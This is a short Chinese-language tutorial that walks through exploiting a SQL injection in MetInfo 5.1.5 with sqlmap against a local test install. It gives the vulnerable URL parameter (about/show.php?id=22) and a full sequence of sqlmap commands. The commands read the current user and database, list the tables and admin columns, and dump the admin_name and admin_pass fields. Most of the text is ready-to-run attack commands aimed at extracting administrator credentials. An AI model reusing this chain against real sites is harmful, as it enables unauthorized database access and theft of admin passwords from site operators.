利用Sqlmap测试MetInfo企业网站管理系统MySql注入

MetInfo，是一款强大的企业网站管理系统，采用PHP+Mysql架构。

叉叉下载的是MetInfo 5.1.5的免费版本，咱不是大拿，不会分析源码，直接丢到WVS里面扫

发现注入点，打开我们的backtrack5,运行Sqlmap神器

获取当前用户名称,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –current-user

获取当前数据库名称，输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –current-db

得到数据库名为：met

列数据库表名，输入命令：python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –tables -D “met“成功得到”met”数据库的表名如下图：

列admin表的字段，输入命令：python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –columns  -T “met_admin_table“ -D “met”

上图显示成功获取met_admin_table表的字段，下面dump出admin_name和admin_pass内容，输入命令：python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –dump -C “admin_pass,admin_name” -T “met_admin_table” -D “met”